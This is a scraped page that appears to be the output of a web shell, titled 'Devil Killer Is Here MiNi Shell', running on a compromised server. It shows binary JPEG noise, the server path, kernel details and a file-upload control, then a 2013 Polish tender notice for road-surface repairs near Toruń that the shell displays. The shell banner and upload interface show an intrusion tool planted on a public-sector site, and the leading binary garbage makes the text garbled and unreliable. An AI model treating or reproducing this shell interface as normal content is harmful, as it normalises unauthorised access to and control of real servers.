JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130115/8391-N-2013.html

<p class="kh_header"><b>Bydgoszcz: Remont cząstkowy nawierzchni bitumicznych na drogach wojewódzkich administrowanych przez RDW - Toruń w  2013/2014r</b><br>
<b>Numer ogłoszenia: 8391 - 2013; data zamieszczenia: 15.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont cząstkowy nawierzchni bitumicznych na drogach wojewódzkich administrowanych przez RDW - Toruń w  2013/2014r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ze względu na rozległy obszar objęty zamówieniem a także trudności w przypadku przemieszczania się sprzętu - całe zamówienie podzielono na 2 części: 

2.1 w części I objęto drogi wojewódzkie:
1. Nr - 250 - Suchatówka - Służewo			     w km 0+000 - 13+631 = 13,631 km
2. Nr - 546 - Zławieś Wielka - Łubianka 		     w km 0+000 - 13+123 = 13,123 km
3. Nr - 553 - Toruń - Łubianka - Wybcz		     w km 6+142 - 21+871 = 15,729 km
4. Nr - 597 - Rzęczkowo -Cichoradz-Unisław	     w km 0+000 - 10+242 = 10,242 km
5. Nr - 245 - Gruczno-Głogówko /do dr nr 1/             w km12+422 - 15+042 =  2,620 km
6. Nr - 248 - Zbrachlin-Borówno			     w km 4+581 -   5+381 =  0,800 km
7. Nr - 249 - Czarnowo - rz. Wisła -Solec Kuj	     w km 0+000 -   1+983 =  1,983 km
8. Nr - 549 - Fordon- rz. Wisła -Strzyżawa		     w km 0+000 -   1+344 =  1,344 km
9. Nr - 550 - Chełmno- Kokocko-Unisław	               w km 0+000 - 25+263 = 25,263 km
10. Nr - 551 - odc. Strzyżawa- Chełmża	               w km 0+000 - 32+000 = 32,000 km       
11. Nr - 291 - St. kolej. Otłoczyn - do dr nr 1	     w km 0+000 -   2+187 =  2,187 km
12. Nr - 273 - Cierpice - Nieszawka		               w km 0+000 -   7+120 =  7,120 km
                                                                                                                  ---------------
                                                             Łącznie długość dróg -    126,042 km




2.2 w części II objęto drogi wojewódzkie: 

13. Nr - 657 - Złotoria- Lubicz Górny 	                    w km 0+000 - 7+735 = 7,735 km
14. Nr - 654 - Silno- Grabówiec- Złotoria		          w km 0+000 - 6+479 = 6,479 km
15. Nr - 646 - Turzno - Brzeźno			          w km 0+000 - 2+783 = 2,783 km
16. Nr - 589 - Grzywna - Chełmża			          w km 0+000 - 4+226 = 4,226 km
17. Nr - 582 - St. kolej. Ostaszewo - do dr 499               w km 0+000 - 1+614 = 1,614 km
18. Nr - 572 - St. kolej. Lubicz - do dr nr 10 	          w km 0+000 - 0+343 = 0,343 km
19. Nr - 552 - Różankowo - Łysomice - Lubicz	       w km 0+000 - 17+371 = 17,371 km
20. Nr - 499 - Ostaszewo (dr 1)-Sławkowo - Mirakowo    w km 0+000 - 7+421  = 7,421 km
21. Nr -258 -(dr nr 1)Brzoza- rz. Wisła -Silno -Obrowo w km 0+000 - 15+266 = 15,266 km
22. Nr - 551 - odc. Chełmża-Orzechowo	                w km 32+000 - 50+046 = 18,046 km
23. Nr - 599- Mirakowo-Grodno             	                    w km  0+000 - 1+385 = 1,385 km
24. Nr - 554 - Orzechowo-Kowalewo Pom.- Kikół	        w km 0+000 - 44+389 = 44,389 km
25. Nr - 649 - Pluskowęsy- Mlewo-Sierakowo	        w km 0+000 - 14+918 = 14,918 km
26. Nr - 556 - Ostrowite- Brzuze-Zbójno	                  w km 0+000 - 12+759 = 12,759 km
27. Nr - 566 - St. kolej. Czernikowo-do dr nr 10	           w km 0+000 - 0+334 = 0,334 km
28. Nr - 569 - Golub Dobrzyń-Dobrzejewic                   w km 0+000 - 21+293 = 21,293 km
                                                                                                               ----------------
                                                                           Łącznie długość dróg - 176,362 km

3. 	Zamówienie obejmuje następujący zakres robót dla części I i dla części II:
3.1. 	Zadanie nr 1: Remont cząstkowy nawierzchni bitumicznych grysami 
         i emulsją asfaltową:
- remont spękań siatkowych nawierzchni, rakowiny,
- remont cząstkowy nawierzchni, głębokość wyboju do 3 cm,
- remont cząstkowy nawierzchni, głębokość wyboju do 4 cm,
- wykonanie oznakowania poziomego cienkowarstwowego.

3.2 	Zadanie nr 2: Remont cząstkowy nawierzchni bitumicznych przy użyciu mieszanki mineralno - asfaltowej:
- remont cząstkowy nawierzchni bitumicznej mieszanką mineralno - asfaltową                    z otaczarki,
- frezowanie nawierzchni,
- oczyszczenie i skropienie nawierzchni,
- wyrównanie istniejącej podbudowy mieszanką mineralno - asfaltową: mechaniczne      rozłożenie i zagęszczenie,
- ułożenie nawierzchni z mieszanki mineralno-asfaltowej - grubość warstwy 4 cm - nakładki,
        - regulacja pionowa kratek ściekowych i włazów kanałowych,
- wykonanie oznakowania poziomego cienkowarstwowego.

3.3. 	Zadanie nr 3: Likwidacja przełomów: 
- mechaniczna rozbiórka nawierzchni i podbudowy,
- mechaniczne wykonanie koryta, 
- wykonanie warstwy odsączającej z piasku,
- wykonanie podbudowy z tłucznia kamiennego:
  warstwa dolna 15 cm,
  warstwa górna 10 cm,
- ułożenie warstwy wiążącej z MMA 0/16 mm, 
- ułożenie warstwy ścieralnej z MMA 0/12,6 mm, 
- wykonanie lub pogłębienie rowu przydrożnego, 
- wykonanie oznakowania poziomego cienkowarstwowego.

4. 	Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.

5. 	Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego.

6.      Wykonawca zobowiązany jest prowadzić remont cząstkowy i likwidację przełomów 
         w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie  z art. 67 ust. 1 pkt 6 ustawy Pzp Zamawiający przewiduje udzielanie zamówienia uzupełniającego, jednakże w wysokości nie większej niż 20% wartości zamówienia 
podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówienia                      np. w przypadku odbywającego się ruchu samochodów ciężarowych oraz w przypadku 
warunków atmosferycznych /opady deszczu/ mają wpływ na zwiększanie się powierzchni remontów.
Warunkiem udzielenia zamówień uzupełniających jest posiadanie środków finansowych na ich wykonanie. Na okoliczność wystąpienia zamówień uzupełniających, zostanie zawarta umowa w trybie zamówienia z wolnej ręki.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	 Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 
dla części I - 8 000,00 zł słownie: osiem tysięcy złotych
dla części II - 11 000,00 zł słownie: jedenaście tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
	a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy nakładają obowiązek ich posiadania 
	b) posiadania wiedzy i doświadczenia
	c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
      do wykonania zamówienia

	d) sytuacji ekonomicznej i finansowej
Wykonawca składa na podst. art. 44 ustawy Pzp oświadczenie o spełnieniu powyższych         warunków.
Zamawiający będzie dokonywał oceny spełniania warunków określonych 
w pkt. V oraz sprawdzenia kompletności i poprawności na podstawie                      dostarczonych oświadczeń i dokumentów określonych w pkt. VI. Warunki będą oceniana wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiedza i doświadczenie - o zamówienie mogą ubiegać się Wykonawcy posiadający           wiedzę i doświadczenie z zakresu objętego zamówieniem. Wykonawca w celu                spełnienia  warunku musi wykazać, że wykonał zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończył co najmniej po dwa zamówienia na remonty cząstkowe                nawierzchni bitumicznych  masą mineralno - asfaltową na gorąco lub emulsją asfaltową i grysami o łącznej  wartości nie mniejszej niż 250 000,0 zł brutto dla części I 
i o łącznej  wartości nie mniejszej niż 320 000,0 zł brutto dla części II w ostatnich  5 latach przed upływem terminu składania ofert a jeżeli okres prowadzenia jest krótszy - w tym okresie.
Zamawiający będzie dokonywał oceny spełniania warunków określonych 
w pkt. V oraz sprawdzenia kompletności i poprawności na podstawie                      dostarczonych oświadczeń i dokumentów określonych w pkt. VI. Warunki będą oceniana wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał techniczny - o zamówienie mogą ubiegać się wykonawcy dysponującym odpowiednim potencjałem technicznym. Wykonawca w celu spełnienia warunku musi wykazać, iż dysponuje na jedną część:
	
        - wytwórnią mieszanek mineralno - asfaltowych wyposażoną w otaczarkę o mieszaniu cyklicznym lub ciągłym z możliwością podgrzewania kruszywa, wyposażoną                               w automatyczny dozownik stabilizatora. Wydajność otaczarki nie mniejsza niż                  120 Mg/h lub sprzętem równoważnym -  1 szt,
- układarką mas bitumicznych wyposażoną w sterownik elektroniczny oraz deskę wibracyjną lub sprzętem równoważnym - 1 szt,
	- zagęszczarką płytową lub sprzętem równoważnym - 1 szt,
	- szczotką mechaniczną lub sprzętem równoważnym - 1 szt,
	- samojezdną skrapiarką lepiszcza wyposażoną w urządzenie pomiarowe oraz               mechanizmy regulacyjne, które zapewniają równomierne rozłożenie lepiszcza                 w kierunku podłużnym i poprzecznym lub sprzętem równoważnym - 1 szt,
	- frezarką do nawierzchni lub sprzętem równoważnym -  1 szt,
	- środkami transportu o ładowności powyżej 10 ton lub sprzętem równoważnym - 2  szt,
	- walcem statycznym lub sprzętem równoważnym - 1 szt,
	- walcem ogumionym lub sprzętem równoważnym - 1 szt,
        - malowarką drogową lub sprzętem równoważnym - 1 szt,
        W przypadku złożenia oferty na dwie części należy spełnić powyższy warunek 
w zakresie dysponowania potencjałem technicznym dla każdej części oddzielnie. 
Zamawiający będzie dokonywał oceny spełniania warunków określonych 
w pkt. V oraz sprawdzenia kompletności i poprawności na podstawie                      dostarczonych oświadczeń i dokumentów określonych w pkt. VI. Warunki będą oceniana wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonania zamówienia - o wykonanie zamówienia mogą 
ubiegać się wykonawcy dysponujący następującymi osobami zdolnymi do wykonania 
zamówienia:
- Kierownik budowy - 1 osoba posiadająca uprawnienia budowlane do kierowania            robotami budowlanymi w specjalności drogowej
  	W przypadku złożenia oferty na dwie części należy spełnić powyższy warunki 
w zakresie dysponowania osobami zdolnymi do wykonania zamówienia dla każdej 
części  oddzielnie. 
Zamawiający będzie dokonywał oceny spełniania warunków określonych 
w pkt. V oraz sprawdzenia kompletności i poprawności na podstawie                      dostarczonych oświadczeń i dokumentów określonych w pkt. VI. Warunki będą oceniana wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ISTOTNE POSTANOWIENIA UMOWY

1.	Zamawiający wymaga zawarcia umowy w sprawie zamówienia publicznego 
na warunkach określonych we wzorze Istotnych Postanowień Umowy 
będącej  załącznikiem nr 10 do niniejszej SIWZ, co Wykonawca potwierdza w formularzu  oferty.
2.	Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość dokonania zmian  postanowień zawartej umowy w stosunku do treści oferty, na podstawie której                  dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej                         z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
2.1.   Zmiana terminu realizacji zamówienia w przypadku: 
a) warunki atmosferyczne odbiegające od typowych (np. długotrwałe, obfite deszcze,  niskie temperatury w dzień i w nocy, przymrozki i inne), uniemożliwiające wykonanie przedmiotu zamówienia zgodnie z SST;
b) zlecania przez Zamawiającego prac dodatkowych jeżeli terminy ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy, a których konieczności zlecenia Zamawiający nie mógł przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy;  
c) prace objęte umową, zostały wstrzymane przez właściwy organ, co uniemożliwia  terminowe zakończenie realizacji przedmiotu umowy;
d) zaistnieje siła wyższa

2.2.  	Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę pod wykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu 
zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji robót.  Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający 
dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie 
zamówienia przez  dotychczasowego podwykonawcę. Zmiany podwykonawcy można dokonać jedynie,  jeżeli wykonywanie części robót przez podwykonawcę zostało 
wskazane przez  Wykonawcę w ofercie. W wypadku gdy Wykonawca nie wskaże w ofercie iż zamierza powierzyć część robót podwykonawcom, ich wprowadzenie na 
etapie wykonywania umowy jest niedopuszczalne.  

2.3.  	Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili 
zawarcia umowy, a których zmiana ma bezpośredni wpływ na wykonanie umowy 
np. gdyby wskutek wydarzeń losowych osoby wskazane w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy;
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie                 i zaakceptowana pisemnie przez Zamawiającego. Zamawiający zaakceptuje zmianę  wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wskazanych w ofercie Wykonawcy,           a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy.
2.4. 	Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych             w treści umowy.
2.5.	Zmiany wynagrodzenia w przypadku:
       	a) zmiany obowiązującej stawki podatku od towarów i usług (VAT);
        b) wystąpienia zamówienia uzupełniającego stanowiącego nie więcej niż 20% zamó-wienia podstawowego za zgodą Zamawiającego i na warunkach określonych w  pkt XX SIWZ .

3.	Zmiany uzasadnione okolicznościami, o których mowa wart. 357 1 k.c. - Jeżeli                 z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone  z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy

